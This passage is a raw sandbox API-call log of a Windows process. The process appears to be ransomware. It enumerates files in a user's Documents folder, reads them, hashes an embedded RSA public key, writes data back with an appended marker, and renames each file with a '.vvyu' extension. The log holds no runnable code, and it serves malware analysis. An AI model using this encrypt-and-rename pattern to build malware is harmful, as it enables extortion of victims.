hHeap=0x6a0000) returned 1 [0195.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a138 [0195.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0195.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0195.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1c8 | out: hHeap=0x6a0000) returned 1 [0195.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0195.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0195.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0195.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a138 | out: hHeap=0x6a0000) returned 1 [0195.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0195.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0195.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0195.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0195.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0195.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0195.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0195.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0195.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0195.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0195.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0195.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0f0 | out: hHeap=0x6a0000) returned 1 [0195.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d426e8 | out: hHeap=0x6a0000) returned 1 [0195.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0195.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0195.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0195.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0195.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0195.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0195.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0195.431] WriteFile (in: hFile=0x52c, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x11bd0, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x11bd0, lpOverlapped=0x0) returned 1 [0195.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0195.432] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x11bd5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.432] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0195.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0195.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0195.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.434] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0195.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.434] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.434] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0195.434] CloseHandle (hObject=0x52c) returned 1 [0195.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x7599e8 [0195.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8b0) returned 0x2d2cc80 [0195.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7599e8 | out: hHeap=0x6a0000) returned 1 [0195.436] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\X9kn7Y7ceFV.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\x9kn7y7cefv.xls"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\X9kn7Y7ceFV.xls.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\x9kn7y7cefv.xls.vvyu")) returned 1 [0195.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0195.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.439] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0195.442] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d89710, ftCreationTime.dwHighDateTime=0x1d89e4f, ftLastAccessTime.dwLowDateTime=0x9d1aa290, ftLastAccessTime.dwHighDateTime=0x1d8a6cb, ftLastWriteTime.dwLowDateTime=0x9d1aa290, ftLastWriteTime.dwHighDateTime=0x1d8a6cb, nFileSizeHigh=0x0, nFileSizeLow=0x89e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YpCtinwvv6IL210.docx", cAlternateFileName="YPCTIN~1.DOC")) returned 1 [0195.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0195.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea678 | out: hHeap=0x6a0000) returned 1 [0195.443] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\YpCtinwvv6IL210.docx") returned=".docx" [0195.443] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\yEpRZCn46rxjDOAUpD\\YpCtinwvv6IL210.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\yeprzcn46rxjdoaupd\\ypctinwvv6il210.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.443] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=35302) returned 1 [0195.443] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.447] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x89c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.447] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.450] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.450] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x89e6, lpOverlapped=0x0) returned 1 [0195.451] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.451] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.451] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.451] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea678) returned 1 [0195.452] CryptCreateHash (in: hProv=0x6ea678, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.452] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.452] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.452] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.452] GetLastError () returned 0x0 [0195.452] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.452] CryptReleaseContext (hProv=0x6ea678, dwFlags=0x0) returned 1 [0195.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.453] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.453] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.453] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x89f0) returned 0x2d49778 [0195.453] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d426e8 [0195.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0f0 [0195.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42730 [0195.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0d8 [0195.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a150 [0195.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1b0 [0195.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a168 [0195.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.454] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1b0 [0195.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0195.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a168 [0195.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a150 [0195.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0195.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0195.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a168 | out: hHeap=0x6a0000) returned 1 [0195.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a150 | out: hHeap=0x6a0000) returned 1 [0195.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0195.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.457] GetCurrentThreadId () returned 0x264 [0195.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46bd0 [0195.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0195.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea678 [0195.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.458] GetCurrentThreadId () returned 0x264 [0195.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1b0 [0195.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a150 [0195.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0195.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.460] RtlAllocateHeap (HeapHandle=0x6a0000, 